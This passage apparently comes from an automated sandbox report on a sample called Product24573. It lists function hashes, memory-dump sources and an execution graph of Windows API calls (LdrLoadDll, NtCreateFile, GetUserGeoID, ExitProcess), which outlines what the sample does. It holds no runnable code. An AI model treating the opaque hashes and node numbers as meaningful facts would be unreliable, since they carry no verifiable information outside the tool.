                                          • Opcode Fuzzy Hash: 8dbdde4c4d932ef780d9739bce5e5e4c28694b2f9091f60f079170bed938a272
                                          • Instruction Fuzzy Hash: 44F0C236A00B04CBDF15FA7888500AEF775EFC1221F04096ED9496B240EF30A545C7C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03392878 Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: effbd216375c86db128911a7fb4ddfbb8e702ccd86f5202c7d12b6b4b18ba87c
                                          • Instruction ID: ead8c33504803c1d3b2ed869e08b98457bb069303f262e09af34e45d0f3b29e4
                                          • Opcode Fuzzy Hash: effbd216375c86db128911a7fb4ddfbb8e702ccd86f5202c7d12b6b4b18ba87c
                                          • Instruction Fuzzy Hash: 2EF0B4367046054F8714AFAFF88481AB7EEEFC52213008A7AD109CB224CFB19C098790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03390BB0 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a45151a6a69f679683983e4dc63e4602c8dad9fed047864ccaa0beb0222c90a8
                                          • Instruction ID: cb61df7486f56adec6f5c4c7dd07ca414fdba6a92dcffc88e91446887a67caa0
                                          • Opcode Fuzzy Hash: a45151a6a69f679683983e4dc63e4602c8dad9fed047864ccaa0beb0222c90a8
                                          • Instruction Fuzzy Hash: 2BF05E3A7006148B9F1DFA69989462EB29AAFC5A19B18803AE9058B390CF34CC02C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 014CD744 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399018224.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_14cd000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95b0c7d70507303ae782f0a5b5510dc223d118e39a399446e557e62a8618fd14
                                          • Instruction ID: 4a8d5e3616cb5ebf4d9805b37cf7e58553a56412eb9ed36579224bb1fe09e733
                                          • Opcode Fuzzy Hash: 95b0c7d70507303ae782f0a5b5510dc223d118e39a399446e557e62a8618fd14
                                          • Instruction Fuzzy Hash: 58F0C279405284AEEB518E5ACCC4B63FF98EB41634F18C56EED085B386C3799844CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03392868 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0344a177fb30d56ad7b107b730efbdaa0987fb83ddc7c8a7e96b5bad93904bb
                                          • Instruction ID: a983a28d13c0c27e34dba9bd2aeee57b87a7cbdb44df5653afdd07421bbed524
                                          • Opcode Fuzzy Hash: a0344a177fb30d56ad7b107b730efbdaa0987fb83ddc7c8a7e96b5bad93904bb
                                          • Instruction Fuzzy Hash: 81F0B475B001055FC7209B7AECD486E7BAAEF962157018A6EE106CB265CAA19C068790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03392528 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa17055e85b4a7f75a56c2ecd227290db9ccd0420be48273cbfb1264ec4b8cba
                                          • Instruction ID: 245cf70121d083d183402e8e726eb49221729de5943f22c95a99b99d41284467
                                          • Opcode Fuzzy Hash: fa17055e85b4a7f75a56c2ecd227290db9ccd0420be48273cbfb1264ec4b8cba
                                          • Instruction Fuzzy Hash: AAF09A31200604DFC620AB1AE88882BB7AEEBC8725B54455EE50A87261CB31AC42CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0339BBBC Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 464302a06e8036dcd85b5e8a704f69e05ebca8ce5160d69c52b607f43430d896
                                          • Instruction ID: c10747c96ac19c8b77d57c0d28445c059ba136112e41233ed1dd2586b3f94eea
                                          • Opcode Fuzzy Hash: 464302a06e8036dcd85b5e8a704f69e05ebca8ce5160d69c52b607f43430d896
                                          • Instruction Fuzzy Hash: 9DF06735A09248DFCB24CF68E8C4AA8BBB4FF46305F0040EAE546DB272CB319946CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03392CDA Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 474b78236ffda398450fdc2818a68d41226d487872b2c7542d0f71fd2e8ab17a
                                          • Instruction ID: d8ee2214a39d3a719f36e3dcec3cfd17a88224a475165afeb3fa513579156d6c
                                          • Opcode Fuzzy Hash: 474b78236ffda398450fdc2818a68d41226d487872b2c7542d0f71fd2e8ab17a
                                          • Instruction Fuzzy Hash: 97F0F475210A10CFC714DB2CD498D5A7BE5AF4A71571589AAE11ACB372CB72EC00CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03392CE8 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cca1793653bc36f5902753deb771c8b5592f074351b06a1f3fbfb1991c1d85f2
                                          • Instruction ID: b7bb3d5047b527b266ae49691e37c31cec6fbfb9a8f48f008bbd06b5d8790fe7
                                          • Opcode Fuzzy Hash: cca1793653bc36f5902753deb771c8b5592f074351b06a1f3fbfb1991c1d85f2
                                          • Instruction Fuzzy Hash: 02F0B234250614CFC718DB28D588C5A7BE5AF4971571548A9E11ACB372CB62EC40CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03398310 Relevance: .0, Instructions: 27COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2be02eb5aa57e63811669d4aeae52edd2b3d5b9d0f247a14566343735de46e9
                                          • Instruction ID: 01158c1cc6bb3ae312314caf502c98d29709976f53a248aabe7168cd90fa1e87
                                          • Opcode Fuzzy Hash: d2be02eb5aa57e63811669d4aeae52edd2b3d5b9d0f247a14566343735de46e9
                                          • Instruction Fuzzy Hash: 8DE04F72B00214ABAB18EAB99C815AFBAEECBC45A0B10817A9509D7204ED309D4147D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033982BE Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67247dc4ec65cefcee3a56ffb1ed748595b5d3860399a120514dc29f9163f2f9
                                          • Instruction ID: 755753ad8577680d76df7bcc880c2ef15c646e8cf68037eb66c6fd8e5ab7185d
                                          • Opcode Fuzzy Hash: 67247dc4ec65cefcee3a56ffb1ed748595b5d3860399a120514dc29f9163f2f9
                                          • Instruction Fuzzy Hash: 34E0DF32A5010CDAEF10DB91E9843EDBB70FB86356F240413E052BD540C7300684CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03397263 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 988729c1169769a182ea4a2a41218bad22362d71f7f4e348d7324bb51bcc01fc
                                          • Instruction ID: fe30bc027fed31f9ea8c8c7490d44ed57da02c81dff46ea190b82f1decfb62d5
                                          • Opcode Fuzzy Hash: 988729c1169769a182ea4a2a41218bad22362d71f7f4e348d7324bb51bcc01fc
                                          • Instruction Fuzzy Hash: 04E065B5A00108EFCB00EFA4E942B6D7BAAFB08300F1081AAD90493354EA362E009F95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03390762 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14701290e329b65745fbcad12c6f805e721d9c4cfb6e396a517d744f8a72d4b3
                                          • Instruction ID: f36a37e3dd581be5a9684bd898dce985067c08bd9d275356bcb9e5909673a8a4
                                          • Opcode Fuzzy Hash: 14701290e329b65745fbcad12c6f805e721d9c4cfb6e396a517d744f8a72d4b3
                                          • Instruction Fuzzy Hash: 2BE086757145108FC728CB2CE884D9DB7E6DF89311715897FE109C7261D670EC058B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0339387C Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 989e8e4e6e3da8f7ed4dbadca5bb9bd2e051074a8945e3fbf6e7b3e2f2d8d41e
                                          • Instruction ID: a41f7339c4ab1a2ce8977010d7a62d95c008806c965981a351ec66f079e0f385
                                          • Opcode Fuzzy Hash: 989e8e4e6e3da8f7ed4dbadca5bb9bd2e051074a8945e3fbf6e7b3e2f2d8d41e
                                          • Instruction Fuzzy Hash: 33F0C979E01149DFEF15EFA4D5C45ECB7B5EF49326F6040AAC515B6200C7325E49CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03397270 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d02e947455166f4f57eef8f11a791c8dd3c34dd325b9c1dacd31d1e55ee755fc
                                          • Instruction ID: f38ec4f317043943bd98685eefc8e53c7367d31cc9983b7733f7e6f653143c54
                                          • Opcode Fuzzy Hash: d02e947455166f4f57eef8f11a791c8dd3c34dd325b9c1dacd31d1e55ee755fc
                                          • Instruction Fuzzy Hash: 08E04FB4A01108EFCB00EFA4E941A6D7BBDFB49310B10C09AD90493214DA352E00DF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03390770 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62690b6b69aea959469ea1a2aedf4b79a7a43bebe8944e8fc671b40668c4430f
                                          • Instruction ID: 68e919ccb9c14d2908450beb222008892ae74a528bae0947878d5a616751beb7
                                          • Opcode Fuzzy Hash: 62690b6b69aea959469ea1a2aedf4b79a7a43bebe8944e8fc671b40668c4430f
                                          • Instruction Fuzzy Hash: FDD01734310A148F8728DA1CE880C9AB3EA9F8C621324856AF109C7660DA61FC048A94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033925C7 Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ecfe55319c201c36326b39d841592cd6d048af69b06737408bd0ef51c29c0292
                                          • Instruction ID: 763680a0ee4bb22e8263d9542b64799f8114f6d3bdc4b3553bd4aabbb19e7608
                                          • Opcode Fuzzy Hash: ecfe55319c201c36326b39d841592cd6d048af69b06737408bd0ef51c29c0292
                                          • Instruction Fuzzy Hash: 7BD05E67F240120B9300E56AB0802985397E3EAA92747C52B9500C334CDE30880703C2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0339B6D0 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4218c26609d05ada859f67a31da87cbc8b3aa98d89ff85b464bb03b395c2ef35
                                          • Instruction ID: 85c02894aed933241ea99204015dade0a1da31596b4b76109486a5697ac82e41
                                          • Opcode Fuzzy Hash: 4218c26609d05ada859f67a31da87cbc8b3aa98d89ff85b464bb03b395c2ef35
                                          • Instruction Fuzzy Hash: EBC092B5C206089BE700EF62F89472277BDF7A8301FA0A22A850086224E3381C14CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0167EA58 Relevance: .3, Instructions: 315COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399193748.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1670000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06ef2179093c2b311faa311a514320ae86a42ff1504f973830ea2f5658109174
                                          • Instruction ID: 82e30a8e05c9ddd804dd4734961ca217d8ff550d02185d978954cc212775ea16
                                          • Opcode Fuzzy Hash: 06ef2179093c2b311faa311a514320ae86a42ff1504f973830ea2f5658109174
                                          • Instruction Fuzzy Hash: 7F12E8F14117468BE732CF25ED981893B69F745328F90620ADA631BADDD7BC016ACF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0167C074 Relevance: .3, Instructions: 265COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399193748.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1670000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c3ad7b8cbc30a94672c547c40d49290d7582278a6076795a770f7e208bca5e41
                                          • Instruction ID: a4f349d900248636e454192c13e4afa34236ac1f97e1c39e0adf2dd7e2b871ef
                                          • Opcode Fuzzy Hash: c3ad7b8cbc30a94672c547c40d49290d7582278a6076795a770f7e208bca5e41
                                          • Instruction Fuzzy Hash: CDA18032E0060ACFCF15DFA4CD845DDBBB7FF85300B1585AAE905AB261EB31A919CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0167EA48 Relevance: .2, Instructions: 224COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399193748.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1670000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4fabcb7e027c5b46d5c273301520f6e1dd4e80d8003c1c9967dea186b7717ef9
                                          • Instruction ID: e2c0b1d9b89b0275b2b3c4239a4d78ec16ca28cbd61b3598e434d7f5026b839b
                                          • Opcode Fuzzy Hash: 4fabcb7e027c5b46d5c273301520f6e1dd4e80d8003c1c9967dea186b7717ef9
                                          • Instruction Fuzzy Hash: 0DC16EB18117468BD732CF28EC981893B79FB45324F50A30BD5636B6D9D7B81166CF88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:3.8%
                                          Dynamic/Decrypted Code Coverage:2.5%
                                          Signature Coverage:4.6%
                                          Total number of Nodes:679
                                          Total number of Limit Nodes:84
                                          execution_graph 33974 4200a3 33977 41e783 33974->33977 33982 41f1b3 33977->33982 33979 41e79f 33986 1139a00 LdrInitializeThunk 33979->33986 33980 41e7ba 33983 41f1c2 33982->33983 33985 41f238 33982->33985 33983->33985 33987 4195b3 33983->33987 33985->33979 33986->33980 33988 4195cd 33987->33988 33989 4195c1 33987->33989 33988->33985 33989->33988 33992 419a33 LdrLoadDll 33989->33992 33991 41971f 33991->33985 33992->33991 33994 1139540 LdrInitializeThunk 33996 40b4c3 33997 40b4e8 33996->33997 34002 40cf03 33997->34002 34001 40b540 34003 40cf27 34002->34003 34004 40cf63 LdrLoadDll 34003->34004 34005 40b51b 34003->34005 34004->34005 34005->34001 34006 40eac3 34005->34006 34007 40eaef 34006->34007 34017 41e3e3 34007->34017 34010 40eb0f 34010->34001 34012 40eb32 34012->34010 34029 41ea13 LdrLoadDll 34012->34029 34014 40eb4a 34030 41e693 34014->34030 34016 40eb6d 34016->34001 34018 41f1b3 LdrLoadDll 34017->34018 34019 40eb08 34018->34019 34019->34010 34020 41e423 34019->34020 34021 41e43f 34020->34021 34022 41f1b3 LdrLoadDll 34020->34022 34033 1139710 LdrInitializeThunk 34021->34033 34022->34021 34023 41e45a 34023->34012 34024 41f1b3 LdrLoadDll 34023->34024 34025 41e47f 34024->34025 34034 1139910 LdrInitializeThunk 34025->34034 34026 41e49e 34026->34012 34029->34014 34031 41e6af NtClose 34030->34031 34032 41f1b3 LdrLoadDll 34030->34032 34031->34016 34032->34031 34033->34023 34034->34026 34036 401664 34037 401691 34036->34037 34041 4233a3 34037->34041 34044 42339f 34037->34044 34038 4017a6 34048 41fbe3 34041->34048 34045 4233a3 34044->34045 34046 41fbe3 22 API calls 34045->34046 34047 4233ae 34046->34047 34047->34038 34049 41fc09 34048->34049 34062 40be93 34049->34062 34051 41fc15 34052 41fc79 34051->34052 34070 410083 34051->34070 34052->34038 34054 41fc34 34055 41fc47 34054->34055 34082 410043 34054->34082 34058 41fc5c 34055->34058 34091 41e8b3 34055->34091 34087 403513 34058->34087 34060 41fc6b 34061 41e8b3 2 API calls 34060->34061 34061->34052 34065 40bea0 34062->34065 34094 40bde3 34062->34094 34064 40bea7 34064->34051 34065->34064 34106 40bd83 34065->34106 34071 4100af 34070->34071 34501 40d3d3 34071->34501 34073 4100c1 34505 40ff53 34073->34505 34076 4100f4 34079 410105 34076->34079 34081 41e693 2 API calls 34076->34081 34077 4100dc 34078 4100e7 34077->34078 34080 41e693 2 API calls 34077->34080 34078->34054 34079->34054 34080->34078 34081->34079 34083 4195b3 LdrLoadDll 34082->34083 34084 410062 34083->34084 34085 410069 34084->34085 34086 41006b GetUserGeoID 34084->34086 34085->34055 34086->34055 34088 403550 34087->34088 34090 403577 34088->34090 34524 40dd63 34088->34524 34090->34060 34092 41f1b3 LdrLoadDll 34091->34092 34093 41e8d2 ExitProcess 34092->34093 34093->34058 34095 40bdf6 34094->34095 34145 41ce53 LdrLoadDll 34094->34145 34125 41cd23 34095->34125 34098 40be09 34098->34065 34099 40bdff 34099->34098 34128 41f533 34099->34128 34101 40be46 34101->34098 34139 40bc23 34101->34139 34103 40be66 34146 40b683 LdrLoadDll 34103->34146 34105 40be78 34105->34065 34107 40bda0 34106->34107 34108 41f823 LdrLoadDll 34106->34108 34482 41f823 34107->34482 34108->34107 34111 41f823 LdrLoadDll 34112 40bdcd 34111->34112 34113 40fe43 34112->34113 34114 40fe5c 34113->34114 34486 40d253 34114->34486 34116 40fe6f 34117 41e3e3 LdrLoadDll 34116->34117 34118 40fe7e 34117->34118 34124 40beb8 34118->34124 34490 41e9d3 34118->34490 34120 40fe95 34121 40fec0 34120->34121 34493 41e463 34120->34493 34123 41e693 2 API calls 34121->34123 34123->34124 34124->34051 34126 41cd38 34125->34126 34147 41e803 LdrLoadDll 34125->34147 34126->34099 34129 41f54c 34128->34129 34148 4191a3 34129->34148 34131 41f564 34132 41f56d 34131->34132 34187 41f373 34131->34187 34132->34101 34134 41f581 34134->34132 34204 41e103 34134->34204 34136 41f5b5 34209 4200e3 34136->34209 34460 409423 34139->34460 34141 40bc44 34141->34103 34142 40bc3d 34142->34141 34473 4096e3 34142->34473 34145->34095 34146->34105 34147->34126 34149 4194e6 34148->34149 34159 4191b7 34148->34159 34149->34131 34152 4192e8 34215 41e563 34152->34215 34153 4192cb 34272 41e663 LdrLoadDll 34153->34272 34156 4192d5 34156->34131 34157 41930f 34158 4200e3 2 API calls 34157->34158 34162 41931b 34158->34162 34159->34149 34212 41de53 34159->34212 34160 4194aa 34163 41e693 2 API calls 34160->34163 34161 4194c0 34278 418ec3 LdrLoadDll NtReadFile NtClose 34161->34278 34162->34156 34162->34160 34162->34161 34167 4193b3 34162->34167 34164 4194b1 34163->34164 34164->34131 34166 4194d3 34166->34131 34168 41941a 34167->34168 34170 4193c2 34167->34170 34168->34160 34169 41942d 34168->34169 34274 41e4e3 34169->34274 34172 4193c7 34170->34172 34173 4193db 34170->34173 34273 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34172->34273 34176 4193e0 34173->34176 34177 4193f8 34173->34177 34218 418e23 34176->34218 34177->34164 34230 418b43 34177->34230 34179 4193d1 34179->34131 34181 41948d 34185 41e693 2 API calls 34181->34185 34182 4193ee 34182->34131 34184 419410 34184->34131 34186 419499 34185->34186 34186->34131 34189 41f38e 34187->34189 34188 41f3a0 34188->34134 34189->34188 34296 420063 34189->34296 34191 41f3c0 34299 4187a3 34191->34299 34193 41f3e3 34193->34188 34194 4187a3 3 API calls 34193->34194 34196 41f405 34194->34196 34196->34188 34331 419b03 34196->34331 34197 41f48d 34198 41f49d 34197->34198 34426 41f133 LdrLoadDll 34197->34426 34342 41efa3 34198->34342 34201 41f4cb 34421 41e0c3 34201->34421 34203 41f4f5 34203->34134 34205 41f1b3 LdrLoadDll 34204->34205 34206 41e11f 34205->34206 34454 113967a 34206->34454 34207 41e13a 34207->34136 34210 41f5df 34209->34210 34457 41e873 34209->34457 34210->34101 34213 41f1b3 LdrLoadDll 34212->34213 34214 41929c 34213->34214 34214->34152 34214->34153 34214->34156 34216 41f1b3 LdrLoadDll 34215->34216 34217 41e57f NtCreateFile 34216->34217 34217->34157 34219 418e3f 34218->34219 34220 41e4e3 LdrLoadDll 34219->34220 34221 418e60 34220->34221 34222 418e67 34221->34222 34223 418e7b 34221->34223 34225 41e693 2 API calls 34222->34225 34224 41e693 2 API calls 34223->34224 34227 418e84 34224->34227 34226 418e70 34225->34226 34226->34182 34279 420203 LdrLoadDll RtlAllocateHeap 34227->34279 34229 418e8f 34229->34182 34231 418b8e 34230->34231 34236 418bc1 34230->34236 34232 41e4e3 LdrLoadDll 34231->34232 34234 418ba9 34232->34234 34233 418d0c 34235 41e4e3 LdrLoadDll 34233->34235 34237 41e693 2 API calls 34234->34237 34242 418d27 34235->34242 34236->34233 34238 418bdd 34236->34238 34239 418bb2 34237->34239 34240 41e4e3 LdrLoadDll 34238->34240 34239->34184 34241 418bf8 34240->34241 34244 418c14 34241->34244 34245 418bff 34241->34245 34292 41e523 LdrLoadDll 34242->34292 34246 418c19 34244->34246 34247 418c2f 34244->34247 34249 41e693 2 API calls 34245->34249 34250 41e693 2 API calls 34246->34250 34257 418c34 34247->34257 34280 4201c3 34247->34280 34248 418d61 34251 41e693 2 API calls 34248->34251 34252 418c08 34249->34252 34253 418c22 34250->34253 34254 418d6c 34251->34254 34252->34184 34253->34184 34254->34184 34265 418c46 34257->34265 34283 41e613 34257->34283 34258 418c9a 34259 418cb1 34258->34259 34291 41e4a3 LdrLoadDll 34258->34291 34261 418cb8 34259->34261 34262 418ccd 34259->34262 34263 41e693 2 API calls 34261->34263 34264 41e693 2 API calls 34262->34264 34263->34265 34266 418cd6 34264->34266 34265->34184 34267 418d02 34266->34267 34286 41fee3 34266->34286 34267->34184 34269 418ced 34270 4200e3 2 API calls 34269->34270 34271 418cf6 34270->34271 34271->34184 34272->34156 34273->34179 34275 419475 34274->34275 34276 41f1b3 LdrLoadDll 34274->34276 34277 41e523 LdrLoadDll 34275->34277 34276->34275 34277->34181 34278->34166 34279->34229 34293 41e833 34280->34293 34282 4201db 34282->34257 34284 41f1b3 LdrLoadDll 34283->34284 34285 41e62f NtReadFile 34284->34285 34285->34258 34287 41fef0 34286->34287 34288 41ff07 34286->34288 34287->34288 34289 4201c3 2 API calls 34287->34289 34288->34269 34290 41ff1e 34289->34290 34290->34269 34291->34259 34292->34248 34294 41f1b3 LdrLoadDll 34293->34294 34295 41e84f RtlAllocateHeap 34294->34295 34295->34282 34297 420090 34296->34297 34427 41e743 34296->34427 34297->34191 34300 4187b4 34299->34300 34301 4187bc 34299->34301 34300->34193 34330 418a8f 34301->34330 34430 421263 34301->34430 34303 418810 34304 421263 2 API calls 34303->34304 34308 41881b 34304->34308 34305 418869 34307 421263 2 API calls 34305->34307 34311 41887d 34307->34311 34308->34305 34309 421393 3 API calls 34308->34309 34441 421303 LdrLoadDll RtlAllocateHeap RtlFreeHeap 34308->34441 34309->34308 34310 4188da 34312 421263 2 API calls 34310->34312 34311->34310 34435 421393 34311->34435 34318 4188f0 34312->34318 34314 41892d 34315 421263 2 API calls 34314->34315 34317 418938 34315->34317 34316 421393 3 API calls 34316->34318 34319 421393 3 API calls 34317->34319 34326 418972 34317->34326 34318->34314 34318->34316 34319->34317 34321 418a67 34443 4212c3 LdrLoadDll RtlFreeHeap 34321->34443 34323 418a71 34444 4212c3 LdrLoadDll RtlFreeHeap 34323->34444 34325 418a7b 34445 4212c3 LdrLoadDll RtlFreeHeap 34325->34445 34442 4212c3 LdrLoadDll RtlFreeHeap 34326->34442 34328 418a85 34446 4212c3 LdrLoadDll RtlFreeHeap 34328->34446 34330->34193 34332 419b14 34331->34332 34333 4191a3 8 API calls 34332->34333 34337 419b2a 34333->34337 34334 419b33 34334->34197 34335 419b67 34336 4200e3 2 API calls 34335->34336 34338 419b78 34336->34338 34337->34334 34337->34335 34339 419bb3 34337->34339 34338->34197 34340 4200e3 2 API calls 34339->34340 34341 419bb8 34340->34341 34341->34197 34343 41efb7 34342->34343 34344 41ee33 LdrLoadDll 34342->34344 34447 41ee33 34343->34447 34344->34343 34346 41efc0 34347 41ee33 LdrLoadDll 34346->34347 34348 41efc9 34347->34348 34349 41ee33 LdrLoadDll 34348->34349 34350 41efd2 34349->34350 34351 41ee33 LdrLoadDll 34350->34351 34352 41efdb 34351->34352 34353 41ee33 